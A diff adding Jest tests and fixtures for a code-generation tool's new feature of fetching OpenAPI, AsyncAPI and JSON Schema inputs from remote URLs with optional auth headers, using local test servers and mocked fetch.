     const testSchemaPath = path.join(os.tmpdir(), 'test-schema.json');
     const testSchema = {
-      $schema: 'http://json-schema.org/draft-07/schema#',
+      $schema: DRAFT_07,
       title: 'User',
       type: 'object',
       properties: {
@@ -76,5 +81,132 @@ describe('JSON Schema Input Processing', () => {
         fs.unlinkSync(txtPath);
       }
     }
+  });
+
+  describe('remote URL loading', () => {
+    test('loads JSON Schema from URL with JSON Content-Type', async () => {
+      const schema = {
+        $schema: DRAFT_07,
+        type: 'object',
+        properties: {id: {type: 'string'}}
+      };
+      const server = await startTestServer([
+        {
+          path: '/schema',
+          body: JSON.stringify(schema),
+          contentType: 'application/json'
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'jsonschema',
+            inputPath: `${server.url}/schema`,
+            generators: []
+          },
+          configFilePath: CONFIG_FILE,
+          documentPath: `${server.url}/schema`
+        };
+        const result = await loadJsonSchema(context);
+        expect(result).toEqual(schema);
+      } finally {
+        await server.close();
+      }
+    });
+
+    test('sends bearer auth header', async () => {
+      const schema = {
+        $schema: DRAFT_07,
+        type: 'object',
+        properties: {a: {type: 'string'}}
+      };
+      const server = await startTestServer([
+        {
+          path: '/schema.json',
+          body: JSON.stringify(schema),
+          contentType: 'application/json',
+          requireHeader: {name: 'authorization', value: 'Bearer abc'}
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'jsonschema',
+            inputPath: `${server.url}/schema.json`,
+            generators: []
+          },
+          configFilePath: CONFIG_FILE,
+          documentPath: `${server.url}/schema.json`,
+          inputAuth: {type: 'bearer', token: 'abc'}
+        };
+        const result = await loadJsonSchema(context);
+        expect(result).toEqual(schema);
+        expect(server.requests[0]!.headers['authorization']).toBe('Bearer abc');
+      } finally {
+        await server.close();
+      }
+    });
+
+    test('loads YAML when Content-Type is yaml', async () => {
+      const yaml = `$schema: '${DRAFT_07}'
+type: object
+properties:
+  name:
+    type: string
+`;
+      const server = await startTestServer([
+        {
+          path: '/schema',
+          body: yaml,
+          contentType: 'application/yaml'
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'jsonschema',
+            inputPath: `${server.url}/schema`,
+            generators: []
+          },
+          configFilePath: CONFIG_FILE,
+          documentPath: `${server.url}/schema`
+        };
+        const result = await loadJsonSchema(context);
+        expect(result.type).toBe('object');
+      } finally {
+        await server.close();
+      }
+    });
+
+    test('falls back to JSON-then-YAML for ambiguous Content-Type', async () => {
+      const yaml = `$schema: '${DRAFT_07}'
+type: object
+properties:
+  name:
+    type: string
+`;
+      const server = await startTestServer([
+        {
+          path: '/schema',
+          body: yaml,
+          contentType: 'text/plain'
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'jsonschema',
+            inputPath: `${server.url}/schema`,
+            generators: []
+          },
+          configFilePath: CONFIG_FILE,
+          documentPath: `${server.url}/schema`
+        };
+        const result = await loadJsonSchema(context);
+        expect(result.type).toBe('object');
+      } finally {
+        await server.close();
+      }
+    });
   });
 });

--- a/test/codegen/inputs/openapi.spec.ts
+++ b/test/codegen/inputs/openapi.spec.ts
@@ -2,6 +2,7 @@ import path from 'path';
 import {loadOpenapi} from '../../../src/codegen/inputs/openapi';
 import {RunGeneratorContext} from '../../../src/codegen/types';
 import { OpenAPIV2, OpenAPIV3, OpenAPIV3_1 } from 'openapi-types';
+import {startTestServer} from './__helpers__/httpServer';
 
 describe('OpenAPI Input Parser', () => {
   it('should load and parse OpenAPI 3.0 document', async () => {
@@ -81,4 +82,149 @@ describe('OpenAPI Input Parser', () => {
 
     await expect(loadOpenapi(context)).rejects.toThrow();
   });
-}); 
+
+  describe('remote URL loading', () => {
+    it('loads an OpenAPI document from a URL', async () => {
+      const yaml = `openapi: 3.0.0
+info:
+  title: Remote
+  version: 1.0.0
+paths: {}
+`;
+      const server = await startTestServer([
+        {
+          path: '/openapi.yaml',
+          body: yaml,
+          contentType: 'application/yaml'
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'openapi',
+            inputPath: `${server.url}/openapi.yaml`,
+            generators: []
+          },
+          configFilePath: 'codegen.json',
+          documentPath: `${server.url}/openapi.yaml`
+        };
+        const document = await loadOpenapi(context) as OpenAPIV3.Document;
+        expect(document.info.title).toBe('Remote');
+      } finally {
+        await server.close();
+      }
+    });
+
+    it('sends bearer auth headers', async () => {
+      const yaml = `openapi: 3.0.0
+info:
+  title: Auth
+  version: 1.0.0
+paths: {}
+`;
+      const server = await startTestServer([
+        {
+          path: '/openapi.yaml',
+          body: yaml,
+          contentType: 'application/yaml',
+          requireHeader: {name: 'authorization', value: 'Bearer abc'}
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'openapi',
+            inputPath: `${server.url}/openapi.yaml`,
+            generators: []
+          },
+          configFilePath: 'codegen.json',
+          documentPath: `${server.url}/openapi.yaml`,
+          inputAuth: {type: 'bearer', token: 'abc'}
+        };
+        await expect(loadOpenapi(context)).resolves.toBeDefined();
+        expect(server.requests[0]!.headers['authorization']).toBe('Bearer abc');
+      } finally {
+        await server.close();
+      }
+    });
+
+    it('parses JSON content based on Content-Type', async () => {
+      const json = JSON.stringify({
+        openapi: '3.0.0',
+        info: {title: 'JSON Remote', version: '1.0.0'},
+        paths: {}
+      });
+      const server = await startTestServer([
+        {
+          path: '/openapi',
+          body: json,
+          contentType: 'application/json'
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'openapi',
+            inputPath: `${server.url}/openapi`,
+            generators: []
+          },
+          configFilePath: 'codegen.json',
+          documentPath: `${server.url}/openapi`
+        };
+        const document = await loadOpenapi(context) as OpenAPIV3.Document;
+        expect(document.info.title).toBe('JSON Remote');
+      } finally {
+        await server.close();
+      }
+    });
+
+    it('uses URL extension fallback for ambiguous Content-Type', async () => {
+      const yaml = `openapi: 3.0.0
+info:
+  title: Yaml fallback
+  version: 1.0.0
+paths: {}
+`;
+      const server = await startTestServer([
+        {
+          path: '/spec.yaml',
+          body: yaml,
+          contentType: 'application/octet-stream'
+        }
+      ]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'openapi',
+            inputPath: `${server.url}/spec.yaml`,
+            generators: []
+          },
+          configFilePath: 'codegen.json',
+          documentPath: `${server.url}/spec.yaml`
+        };
+        const document = await loadOpenapi(context) as OpenAPIV3.Document;
+        expect(document.info.title).toBe('Yaml fallback');
+      } finally {
+        await server.close();
+      }
+    });
+
+    it('propagates 404 errors', async () => {
+      const server = await startTestServer([]);
+      try {
+        const context: RunGeneratorContext = {
+          configuration: {
+            inputType: 'openapi',
+            inputPath: `${server.url}/missing.yaml`,
+            generators: []
+          },
+          configFilePath: 'codegen.json',
+          documentPath: `${server.url}/missing.yaml`
+        };
+        await expect(loadOpenapi(context)).rejects.toThrow();
+      } finally {
+        await server.close();
+      }
+    });
+  });
+});

--- a/test/codegen/inputs/remote-url.e2e.spec.ts
+++ b/test/codegen/inputs/remote-url.e2e.spec.ts
@@ -1,0 +1,359 @@
+import http from 'http';
+import {AddressInfo} from 'net';
+import {loadOpenapi} from '../../../src/codegen/inputs/openapi';
+import {loadAsyncapi} from '../../../src/codegen/inputs/asyncapi';
+import {loadJsonSchema} from '../../../src/codegen/inputs/jsonschema';
+import {RunGeneratorContext} from '../../../src/codegen/types';
+import {Logger} from '../../../src/LoggingInterface';
+import {
+  startTestServer,
+  readFixture,
+  RecordedRequest
+} from './__helpers__/httpServer';
+
+const BEARER = 'Bearer secret-token';
+
+function ctx(
+  inputType: 'openapi' | 'asyncapi' | 'jsonschema',
+  url: string,
+  inputAuth?: any
+): RunGeneratorContext {
+  return {
+    configuration: {
+      inputType,
+      inputPath: url,
+      generators: []
+    } as any,
+    configFilePath: 'codegen.json',
+    documentPath: url,
+    inputAuth
+  };
+}
+
+/**
+ * Start an HTTP server whose response bodies depend on the actual
+ * bound port (so they can include `$ref` URLs back to localhost:<port>).
+ * The handler receives `{port, requests}` so it can construct bodies that
+ * reference the server itself.
+ */
+async function startDynamicServer(
+  build: (port: number, requests: RecordedRequest[]) => http.RequestListener
+): Promise<{
+  url: string;
+  port: number;
+  requests: RecordedRequest[];
+  close: () => Promise<void>;
+}> {
+  const requests: RecordedRequest[] = [];
+  const server = http.createServer((req, res) => {
+    requests.push({
+      url: req.url ?? '',
+      method: req.method ?? 'GET',
+      headers: {...req.headers}
+    });
+    // Defer to the user-provided listener that knows the port:
+    // We need to bind first to know the port; the placeholder below is
+    // replaced once the server is listening (see swap pattern).
+    placeholder(req, res);
+  });
+
+  let placeholder: http.RequestListener = (_req, res) => {
+    res.writeHead(503);
+    res.end('not ready');
+  };
+
+  await new Promise<void>((resolve) => server.listen(0, '127.0.0.1', resolve));
+  const port = (server.address() as AddressInfo).port;
+  placeholder = build(port, requests);
+
+  return {
+    url: `http://127.0.0.1:${port}`,
+    port,
+    requests,
+    close: () =>
+      new Promise<void>((resolve, reject) =>
+        server.close((err) => (err ? reject(err) : resolve()))
+      )
+  };
+}
+
+describe('Remote URL E2E (real HTTP server)', () => {
+  describe('Cases 1-3: root URL with auth', () => {
+    it('1. Bearer auth on root URL (asyncapi)', async () => {
+      const fixture = readFixture('asyncapi.yaml');
+      const server = await startTestServer([
+        {
+          path: '/asyncapi.yaml',
+          body: fixture,
+          contentType: 'application/yaml',
+          requireHeader: {name: 'authorization', value: BEARER}
+        }
+      ]);
+      try {
+        await loadAsyncapi(
+          ctx('asyncapi', `${server.url}/asyncapi.yaml`, {
+            type: 'bearer',
+            token: 'secret-token'
+          })
+        );
+        expect(server.requests).toHaveLength(1);
+        expect(server.requests[0]!.headers['authorization']).toBe(BEARER);
+      } finally {
+        await server.close();
+      }
+    });
+
+    it('2. apiKey auth on root URL (jsonschema)', async () => {
+      const schema = {
+        $schema: 'http://json-schema.org/draft-07/schema#',
+        type: 'object',
+        properties: {id: {type: 'string'}}
+      };
+      const server = await startTestServer([
+        {
+          path: '/schema.json',
+          body: JSON.stringify(schema),
+          contentType: 'application/json',
+          requireHeader: {name: 'x-api-key', value: 'k'}
+        }
+      ]);
+      try {
+        const result = await loadJsonSchema(
+          ctx('jsonschema', `${server.url}/schema.json`, {
+            type: 'apiKey',
+            header: 'X-API-Key',
+            value: 'k'
+          })
+        );
+        expect(result).toEqual(schema);
+      } finally {
+        await server.close();
+      }
+    });
+
+    it('3. Custom headers on root URL (openapi)', async () => {
+      const yaml = `openapi: 3.0.0
+info:
+  title: Custom Headers
+  version: 1.0.0
+paths: {}
+`;
+      const server = await startTestServer([
+        {
+          path: '/openapi.yaml',
+          body: yaml,
+          contentType: 'application/yaml',
+          requireHeader: {name: 'x-custom', value: 'value'}
+        }
+      ]);
+      try {
+        const document = await loadOpenapi(
+          ctx('openapi', `${server.url}/openapi.yaml`, {
+            type: 'custom',
+            headers: {'X-Custom': 'value'}
+          })
+        );
+        expect(document).toBeDefined();
+      } finally {
+        await server.close();
+      }
+    });
+  });
+
+  describe('Case 4: cross-spec $ref same host with auth', () => {
+    it('OpenAPI cross-spec $ref to same host with auth on both fetches', async () => {
+      function authOk(req: http.IncomingMessage): boolean {
+        return req.headers['authorization'] === BEARER;
+      }
+
+      const server = await startDynamicServer((port) => {
+        const root = `openapi: 3.0.0
+info:
+  title: Same host
+  version: 1.0.0
+paths:
+  /pets:
+    get:
+      summary: List pets
+      responses:
+        '200':
+          description: OK
+          content:
+            application/json:
+              schema:
+                $ref: 'http://127.0.0.1:${port}/components.yaml#/components/schemas/Pet'
+`;
+        const components = `openapi: 3.0.0
+info:
+  title: Components
+  version: 1.0.0
+paths: {}
+components:
+  schemas:
+    Pet:
+      type: object
+      properties:
+        id:
+          type: string
+`;
+        return (req, res) => {
+          if (!authOk(req)) {
+            res.writeHead(401);
+            res.end('Unauthorized');
+            return;
+          }
+          if (req.url === '/openapi.yaml') {
+            res.writeHead(200, {'content-type': 'application/yaml'});
+            res.end(root);
+            return;
+          }
+          if (req.url === '/components.yaml') {
+            res.writeHead(200, {'content-type': 'application/yaml'});
+            res.end(components);
+            return;
+          }
+          res.writeHead(404);
+          res.end('Not found');
+        };
+      });
+
+      try {
+        const document = await loadOpenapi(
+          ctx('openapi', `${server.url}/openapi.yaml`, {
+            type: 'bearer',
+            token: 'secret-token'
+          })
+        );
+        const componentsHits = server.requests.filter(
+          (r) => r.url === '/components.yaml'
+        );
+        expect(componentsHits.length).toBeGreaterThanOrEqual(1);
+        expect(componentsHits[0]!.headers['authorization']).toBe(BEARER);
+        expect(document).toBeDefined();
+      } finally {
+        await server.close();
+      }
+    });
+  });
+
+  describe('Case 6: cross-host warning', () => {
+    it('emits info-level warning when $ref host differs from root host', async () => {
+      const components = `openapi: 3.0.0
+info:
+  title: Components
+  version: 1.0.0
+paths: {}
+components:
+  schemas:
+    Pet:
+      type: object
+      properties:
+        id:
+          type: string
+`;
+      const refServer = await startTestServer([
+        {
+          path: '/components.yaml',
+          body: components,
+          contentType: 'application/yaml',
+          requireHeader: {name: 'authorization', value: BEARER}
+        }
+      ]);
+
+      const rootServer = await startDynamicServer(() => (req, res) => {
+        if (req.headers['authorization'] !== BEARER) {
+          res.writeHead(401);
+          res.end('Unauthorized');
+          return;
+        }
+        if (req.url === '/openapi.yaml') {
+          const yaml = `openapi: 3.0.0
+info:
+  title: Cross host
+  version: 1.0.0
+paths:
+  /pets:
+    get:
+      summary: List pets
+      responses:
+        '200':
+          description: OK
+          content:
+            application/json:
+              schema:
+                $ref: '${refServer.url}/components.yaml#/components/schemas/Pet'
+`;
+          res.writeHead(200, {'content-type': 'application/yaml'});
+          res.end(yaml);
+          return;
+        }
+        res.writeHead(404);
+        res.end('Not found');
+      });
+
+      const infoSpy = jest
+        .spyOn(Logger, 'info')
+        .mockImplementation(() => undefined);
+      try {
+        await loadOpenapi(
+          ctx('openapi', `${rootServer.url}/openapi.yaml`, {
+            type: 'bearer',
+            token: 'secret-token'
+          })
+        );
+        const crossHostLogs = infoSpy.mock.calls.filter(([msg]) =>
+          String(msg).includes('auth headers sent to')
+        );
+        expect(crossHostLogs.length).toBeGreaterThanOrEqual(1);
+      } finally {
+        infoSpy.mockRestore();
+        await rootServer.close();
+        await refServer.close();
+      }
+    });
+  });
+
+  describe('Case 7: 401 on root', () => {
+    it('throws a CodegenError', async () => {
+      const server = await startTestServer([
+        {
+          path: '/openapi.yaml',
+          body: '',
+          requireHeader: {name: 'authorization', value: 'Bearer match'}
+        }
+      ]);
+      try {
+        await expect(
+          loadOpenapi(
+            ctx('openapi', `${server.url}/openapi.yaml`, {
+              type: 'bearer',
+              token: 'wrong'
+            })
+          )
+        ).rejects.toThrow();
+      } finally {
+        await server.close();
+      }
+    });
+  });
+
+  describe('Case 9: no auth on public root URL', () => {
+    it('succeeds without an Authorization header', async () => {
+      const yaml = `openapi: 3.0.0
+info:
+  title: Public
+  version: 1.0.0
+paths: {}
+`;
+      const server = await startTestServer([
+        {path: '/openapi.yaml', body: yaml, contentType: 'application/yaml'}
+      ]);
+      try {
+        await loadOpenapi(ctx('openapi', `${server.url}/openapi.yaml`));
+        expect(server.requests[0]!.headers['authorization']).toBeUndefined();
+      } finally {
+        await server.close();
+      }
+    });
+  });
+});

--- a/test/configs/remote-url/asyncapi.yaml
+++ b/test/configs/remote-url/asyncapi.yaml
@@ -1,0 +1,13 @@
+asyncapi: 2.6.0
+info:
+  title: Remote URL Test
+  version: 1.0.0
+channels:
+  user/signedup:
+    publish:
+      message:
+        payload:
+          type: object
+          properties:
+            email:
+              type: string

--- a/test/configs/remote-url/jsonschema.json
+++ b/test/configs/remote-url/jsonschema.json
@@ -1,0 +1,10 @@
+{
+  "$schema": "http://json-schema.org/draft-07/schema#",
+  "title": "RemoteUser",
+  "type": "object",
+  "properties": {
+    "id": { "type": "string" },
+    "email": { "type": "string", "format": "email" }
+  },
+  "required": ["id", "email"]
+}

--- a/test/configs/remote-url/openapi-components.yaml
+++ b/test/configs/remote-url/openapi-components.yaml
@@ -1,0 +1,14 @@
+openapi: 3.0.0
+info:
+  title: Components
+  version: 1.0.0
+paths: {}
+components:
+  schemas:
+    Pet:
+      type: object
+      properties:
+        id:
+          type: string
+        breed:
+          $ref: 'SCHEMAS_URL#/components/schemas/Breed'

--- a/test/configs/remote-url/openapi-schemas.yaml
+++ b/test/configs/remote-url/openapi-schemas.yaml
@@ -1,0 +1,12 @@
+openapi: 3.0.0
+info:
+  title: Schemas
+  version: 1.0.0
+paths: {}
+components:
+  schemas:
+    Breed:
+      type: object
+      properties:
+        name:
+          type: string

--- a/test/configs/remote-url/openapi.yaml
+++ b/test/configs/remote-url/openapi.yaml
@@ -1,0 +1,15 @@
+openapi: 3.0.0
+info:
+  title: Remote URL Test
+  version: 1.0.0
+paths:
+  /pets:
+    get:
+      summary: List pets
+      responses:
+        '200':
+          description: OK
+          content:
+            application/json:
+              schema:
+                $ref: 'COMPONENTS_URL#/components/schemas/Pet'

--- a/test/utils/inputSource.spec.ts
+++ b/test/utils/inputSource.spec.ts
@@ -1,0 +1,61 @@
+import {isRemoteUrl, getInputSourceType} from '../../src/utils/inputSource';
+
+describe('inputSource utilities', () => {
+  describe('isRemoteUrl', () => {
+    it('returns true for http URL', () => {
+      expect(isRemoteUrl('http://example.com/spec.json')).toBe(true);
+    });
+
+    it('returns true for https URL', () => {
+      expect(isRemoteUrl('https://example.com/spec.yaml')).toBe(true);
+    });
+
+    it('returns false for file:// URL (not yet supported)', () => {
+      expect(isRemoteUrl('file:///etc/spec.yaml')).toBe(false);
+    });
+
+    it('returns false for relative path', () => {
+      expect(isRemoteUrl('./spec.yaml')).toBe(false);
+    });
+
+    it('returns false for absolute filesystem path on POSIX', () => {
+      expect(isRemoteUrl('/var/spec.yaml')).toBe(false);
+    });
+
+    it('returns false for absolute filesystem path on Windows', () => {
+      expect(isRemoteUrl('C:\\Users\\spec.yaml')).toBe(false);
+    });
+
+    it('returns false for empty string', () => {
+      expect(isRemoteUrl('')).toBe(false);
+    });
+
+    it('returns false for malformed string starting with httpz', () => {
+      expect(isRemoteUrl('httpz://example.com')).toBe(false);
+    });
+  });
+
+  describe('getInputSourceType', () => {
+    it('classifies http(s) URL as remote_url', () => {
+      expect(getInputSourceType('https://example.com/spec.json')).toBe(
+        'remote_url'
+      );
+      expect(getInputSourceType('http://example.com/spec.yaml')).toBe(
+        'remote_url'
+      );
+    });
+
+    it('classifies relative path as local_relative', () => {
+      expect(getInputSourceType('./spec.yaml')).toBe('local_relative');
+      expect(getInputSourceType('spec.json')).toBe('local_relative');
+    });
+
+    it('classifies absolute path as local_absolute', () => {
+      // path.isAbsolute is platform-aware; both forms below are absolute
+      // on at least one supported platform
+      const absolute =
+        process.platform === 'win32' ? 'C:\\spec.yaml' : '/var/spec.yaml';
+      expect(getInputSourceType(absolute)).toBe('local_absolute');
+    });
+  });
+});

--- a/test/utils/refResolvers.spec.ts
+++ b/test/utils/refResolvers.spec.ts
@@ -1,0 +1,127 @@
+import {
+  createOpenapiRefParserResolver,
+  createAsyncapiResolvers
+} from '../../src/utils/refResolvers';
+import {fetchRemoteDocument} from '../../src/utils/remoteFetch';
+import {Logger} from '../../src/LoggingInterface';
+
+jest.mock('../../src/utils/remoteFetch', () => ({
+  fetchRemoteDocument: jest.fn()
+}));
+
+describe('refResolvers', () => {
+  const fetchSpy = fetchRemoteDocument as jest.MockedFunction<
+    typeof fetchRemoteDocument
+  >;
+
+  beforeEach(() => {
+    fetchSpy.mockReset();
+    fetchSpy.mockResolvedValue({
+      content: '{"ok":true}',
+      contentType: 'application/json',
+      finalUrl: 'https://example.com/ref.json'
+    });
+  });
+
+  afterEach(() => {
+    jest.restoreAllMocks();
+  });
+
+  describe('createOpenapiRefParserResolver', () => {
+    it('returns an HTTPResolverOptions object with a read function', () => {
+      const resolver = createOpenapiRefParserResolver(undefined, {
+        rootUrl: 'https://api.example.com/openapi.yaml'
+      });
+      expect(typeof resolver.read).toBe('function');
+    });
+
+    it('read() delegates to fetchRemoteDocument with the configured auth', async () => {
+      const auth = {type: 'bearer' as const, token: 'abc'};
+      const resolver = createOpenapiRefParserResolver(auth, {
+        rootUrl: 'https://api.example.com/openapi.yaml'
+      });
+      const read = resolver.read as (file: {url: string}) => Promise<string>;
+      const result = await read({url: 'https://api.example.com/components.yaml'});
+      expect(result).toBe('{"ok":true}');
+      expect(fetchSpy).toHaveBeenCalledWith(
+        'https://api.example.com/components.yaml',
+        auth
+      );
+    });
+
+    it('emits a debug log per fetched URL', async () => {
+      const debugSpy = jest.spyOn(Logger, 'debug').mockImplementation(() => undefined);
+      const resolver = createOpenapiRefParserResolver(undefined, {
+        rootUrl: 'https://api.example.com/openapi.yaml'
+      });
+      const read = resolver.read as (file: {url: string}) => Promise<string>;
+      await read({url: 'https://api.example.com/components.yaml'});
+      expect(debugSpy).toHaveBeenCalledWith(
+        expect.stringContaining('https://api.example.com/components.yaml')
+      );
+    });
+
+    it('emits one info-level log per distinct cross-host destination', async () => {
+      const infoSpy = jest.spyOn(Logger, 'info').mockImplementation(() => undefined);
+      const resolver = createOpenapiRefParserResolver(
+        {type: 'bearer', token: 'abc'},
+        {rootUrl: 'https://api.example.com/openapi.yaml'}
+      );
+      const read = resolver.read as (file: {url: string}) => Promise<string>;
+      // Two refs to the same cross-host -> info log fires once
+      await read({url: 'https://schemas.public.example.org/Pet.yaml'});
+      await read({url: 'https://schemas.public.example.org/Order.yaml'});
+      // A second cross-host -> a second info log
+      await read({url: 'https://other.example.net/Foo.yaml'});
+      // Same-host ref -> no additional info log
+      await read({url: 'https://api.example.com/components.yaml'});
+
+      const crossHostLogs = infoSpy.mock.calls.filter(([msg]) =>
+        String(msg).includes('auth headers sent to')
+      );
+      expect(crossHostLogs.length).toBe(2);
+    });
+
+    it('does not emit cross-host warning when no auth is configured', async () => {
+      const infoSpy = jest.spyOn(Logger, 'info').mockImplementation(() => undefined);
+      const resolver = createOpenapiRefParserResolver(undefined, {
+        rootUrl: 'https://api.example.com/openapi.yaml'
+      });
+      const read = resolver.read as (file: {url: string}) => Promise<string>;
+      await read({url: 'https://other.example.net/Foo.yaml'});
+      const crossHostLogs = infoSpy.mock.calls.filter(([msg]) =>
+        String(msg).includes('auth headers sent to')
+      );
+      expect(crossHostLogs.length).toBe(0);
+    });
+  });
+
+  describe('createAsyncapiResolvers', () => {
+    it('returns an array with two resolvers (http + https)', () => {
+      const resolvers = createAsyncapiResolvers(undefined, {
+        rootUrl: 'https://api.example.com/asyncapi.yaml'
+      });
+      expect(Array.isArray(resolvers)).toBe(true);
+      expect(resolvers.map((r) => r.schema).sort()).toEqual(['http', 'https']);
+    });
+
+    it('read() delegates to fetchRemoteDocument with the configured auth', async () => {
+      const auth = {type: 'apiKey' as const, header: 'X-API-Key', value: 'k'};
+      const resolvers = createAsyncapiResolvers(auth, {
+        rootUrl: 'https://api.example.com/asyncapi.yaml'
+      });
+      const httpsResolver = resolvers.find((r) => r.schema === 'https')!;
+      // Spectral resolvers use a urijs-like Uri object; both `.toString()`
+      // and string coercion must work. Use a minimal stub.
+      const uri = {
+        toString: () => 'https://api.example.com/components.yaml'
+      };
+      const result = await httpsResolver.read(uri as any);
+      expect(result).toBe('{"ok":true}');
+      expect(fetchSpy).toHaveBeenCalledWith(
+        'https://api.example.com/components.yaml',
+        auth
+      );
+    });
+  });
+});

--- a/test/utils/remoteFetch.spec.ts
+++ b/test/utils/remoteFetch.spec.ts
@@ -1,0 +1,195 @@
+import {fetchRemoteDocument} from '../../src/utils/remoteFetch';
+import {CodegenError, ErrorType} from '../../src/codegen/errors';
+
+type FetchMock = jest.SpyInstance<
+  ReturnType<typeof fetch>,
+  Parameters<typeof fetch>
+>;
+
+function mockFetchOnce(
+  fetchSpy: FetchMock,
+  init: {
+    status?: number;
+    statusText?: string;
+    body?: string;
+    contentType?: string;
+    finalUrl?: string;
+  } = {}
+) {
+  const status = init.status ?? 200;
+  const headers = new Headers();
+  if (init.contentType) {
+    headers.set('content-type', init.contentType);
+  }
+  fetchSpy.mockResolvedValueOnce(
+    new Response(init.body ?? '{}', {
+      status,
+      statusText: init.statusText ?? '',
+      headers
+    })
+  );
+}
+
+describe('fetchRemoteDocument', () => {
+  let fetchSpy: FetchMock;
+
+  beforeEach(() => {
+    fetchSpy = jest.spyOn(globalThis, 'fetch') as unknown as FetchMock;
+  });
+
+  afterEach(() => {
+    fetchSpy.mockRestore();
+    jest.useRealTimers();
+  });
+
+  it('attaches Authorization header for bearer auth', async () => {
+    mockFetchOnce(fetchSpy, {
+      body: '{"ok":true}',
+      contentType: 'application/json'
+    });
+    await fetchRemoteDocument('https://example.com/spec.json', {
+      type: 'bearer',
+      token: 'abc'
+    });
+    const init = fetchSpy.mock.calls[0][1] as RequestInit;
+    const headers = new Headers(init.headers);
+    expect(headers.get('authorization')).toBe('Bearer abc');
+  });
+
+  it('attaches custom header for apiKey auth', async () => {
+    mockFetchOnce(fetchSpy, {body: '{}'});
+    await fetchRemoteDocument('https://example.com/spec.json', {
+      type: 'apiKey',
+      header: 'X-API-Key',
+      value: 'secret'
+    });
+    const init = fetchSpy.mock.calls[0][1] as RequestInit;
+    const headers = new Headers(init.headers);
+    expect(headers.get('x-api-key')).toBe('secret');
+  });
+
+  it('attaches all custom headers verbatim', async () => {
+    mockFetchOnce(fetchSpy, {body: '{}'});
+    await fetchRemoteDocument('https://example.com/spec.json', {
+      type: 'custom',
+      headers: {Authorization: 'Bearer custom', 'X-Trace': 'abc-123'}
+    });
+    const init = fetchSpy.mock.calls[0][1] as RequestInit;
+    const headers = new Headers(init.headers);
+    expect(headers.get('authorization')).toBe('Bearer custom');
+    expect(headers.get('x-trace')).toBe('abc-123');
+  });
+
+  it('returns content + contentType + finalUrl on 2xx', async () => {
+    mockFetchOnce(fetchSpy, {
+      body: '{"ok":true}',
+      contentType: 'application/json'
+    });
+    const result = await fetchRemoteDocument(
+      'https://example.com/spec.json'
+    );
+    expect(result.content).toBe('{"ok":true}');
+    expect(result.contentType).toBe('application/json');
+    expect(result.finalUrl).toBeDefined();
+  });
+
+  it('sends no auth headers when none configured', async () => {
+    mockFetchOnce(fetchSpy, {body: '{}'});
+    await fetchRemoteDocument('https://example.com/spec.json');
+    const init = fetchSpy.mock.calls[0][1] as RequestInit;
+    const headers = new Headers(init.headers);
+    expect(headers.get('authorization')).toBeNull();
+  });
+
+  async function captureRejection(
+    fn: () => Promise<unknown>
+  ): Promise<CodegenError> {
+    try {
+      await fn();
+    } catch (e) {
+      return e as CodegenError;
+    }
+    throw new Error('expected fetchRemoteDocument to reject');
+  }
+
+  it('throws CodegenError with auth-failure help text on 401', async () => {
+    mockFetchOnce(fetchSpy, {status: 401, statusText: 'Unauthorized'});
+    const err = await captureRejection(() =>
+      fetchRemoteDocument('https://example.com/spec.json')
+    );
+    expect(err.type).toBe(ErrorType.INPUT_DOCUMENT_ERROR);
+    expect(err.message).toContain('401');
+    expect(err.help?.toLowerCase()).toMatch(/auth/);
+  });
+
+  it('throws CodegenError on 403', async () => {
+    mockFetchOnce(fetchSpy, {status: 403, statusText: 'Forbidden'});
+    await expect(
+      fetchRemoteDocument('https://example.com/spec.json')
+    ).rejects.toMatchObject({
+      message: expect.stringContaining('403')
+    });
+  });
+
+  it('throws CodegenError with not-found help on 404', async () => {
+    mockFetchOnce(fetchSpy, {status: 404, statusText: 'Not Found'});
+    const err = await captureRejection(() =>
+      fetchRemoteDocument('https://example.com/spec.json')
+    );
+    expect(err.message).toMatch(/404/);
+    expect(err.help?.toLowerCase()).toMatch(/url|verify/);
+  });
+
+  it('throws CodegenError with rate-limit help on 429', async () => {
+    mockFetchOnce(fetchSpy, {status: 429, statusText: 'Too Many Requests'});
+    const err = await captureRejection(() =>
+      fetchRemoteDocument('https://example.com/spec.json')
+    );
+    expect(err.message).toMatch(/429/);
+    expect(err.help?.toLowerCase()).toMatch(/rate|retry/);
+  });
+
+  it('throws CodegenError on 500', async () => {
+    mockFetchOnce(fetchSpy, {status: 500, statusText: 'Server Error'});
+    await expect(
+      fetchRemoteDocument('https://example.com/spec.json')
+    ).rejects.toMatchObject({
+      message: expect.stringContaining('500')
+    });
+  });
+
+  it('throws CodegenError on network failure', async () => {
+    fetchSpy.mockRejectedValueOnce(new TypeError('fetch failed'));
+    const err = await captureRejection(() =>
+      fetchRemoteDocument('https://example.com/spec.json')
+    );
+    expect(err).toBeInstanceOf(CodegenError);
+    expect(err.help?.toLowerCase()).toMatch(/network|connect/);
+  });
+
+  it('throws CodegenError with timeout help on AbortError', async () => {
+    fetchSpy.mockImplementationOnce((_url, init) => {
+      const signal = (init as RequestInit | undefined)?.signal as
+        | AbortSignal
+        | undefined;
+      return new Promise((_resolve, reject) => {
+        if (signal) {
+          signal.addEventListener('abort', () => {
+            const e = new Error('aborted');
+            e.name = 'AbortError';
+            reject(e);
+          });
+        }
+      });
+    });
+    const err = await captureRejection(() =>
+      fetchRemoteDocument(
+        'https://example.com/spec.json',
+        undefined,
+        {timeoutMs: 10}
+      )
+    );
+    expect(err).toBeInstanceOf(CodegenError);
+    expect(err.help?.toLowerCase()).toMatch(/timeout|timed out/);
+  });
+});

--- a/website/src/schemas/configuration-schema.json
+++ b/website/src/schemas/configuration-schema.json
@@ -19,6 +19,9 @@
                     "type": "string",
                     "markdownDescription": "Path or URL to the input document used as the source for code generation. [Read more about configurations here](https://the-codegen-project.org/docs/configurations)"
                 },
+                "auth": {
+                    "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/auth"
+                },
                 "language": {
                     "$ref": "#/definitions/AsyncAPICodegenConfiguration/properties/language"
                 },
